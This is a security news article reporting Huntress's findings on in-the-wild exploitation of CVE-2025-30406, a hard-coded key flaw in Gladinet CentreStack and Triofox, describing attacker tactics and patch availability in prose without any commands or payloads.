Security researchers at Huntress are documenting active exploitation of a critical vulnerability in Gladinet CentreStack and Triofox software, where default cryptographic configurations have enabled attacks against seven organizations and triggered anomalous activity on roughly 120 endpoints.
The flaw, tagged as CVE-2025-30406, was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog in early April and carries a CVSS severity score of 9/10.
The vulnerability stems from hard coded cryptographic keys embedded by default in the configuration files of both CentreStack and Triofox, a misconfiguration that has left servers exposed to remote code execution attacks.
In this case, exploiting the default keys allows an attacker to bypass ASPX ViewState protections and execute code as the IIS application pool user, with potential escalation to full system control.
Huntress said its security operations center flagged the anomaly on April 11 when an internal detector, custom-built to catch zero-day exploits, flagged abnormal outbound connections emerging from an irregular child process of the IIS worker process.
The company said this initial detection, highlighted by a suspicious process tree originating from Powershell, set off a cascade of alerts, as malware hunters pieced together evidence from failed ViewState verifications and other indicators visible in Windows Event Logs.
The company said the exploits followed a well-known playbook. Once a vulnerable server is identified, threat actors issue carefully crafted PowerShell commands to trigger the vulnerability, ultimately leading to remote code execution.
In one instance, Huntress researchers say they traced a command sequence involving an encoded PowerShell directive intended to download and execute a DLL, an approach seen in recent attacks on CrushFTP software vulnerabilities.
“There are a few hundred vulnerable servers exposed to the public Internet according to Shodan. While this may be a relatively small number, the risk of immediate compromise is still severe,” Huntress warned.
Huntress said it observed the threat actors moving laterally within networks, leveraging tools such as MeshCentral to maintain remote access. The company said the hackers also attempted to add new user accounts, execute standard enumeration commands, and employ default Impacket scripts.
Gradient has shipped patches and acknowledged the remote code execution risks.
“We can confirm the Gladinet CentreStack and Triofox patches are effective in stopping exploitation from our tested proof-of-concept,” Huntress said.
Related: Vulnerability in OttoKit WordPress Plugin Exploited in the Wild
Related: Incomplete Nvidia Patch Leaves AI Containers Exposed
Related: Rapid7 Reveals RCE Path in Ivanti Appliance After Silent Patch Debacle
Related: Threat Actor Allegedly Selling Fortinet Firewall Zero-Day Exploit
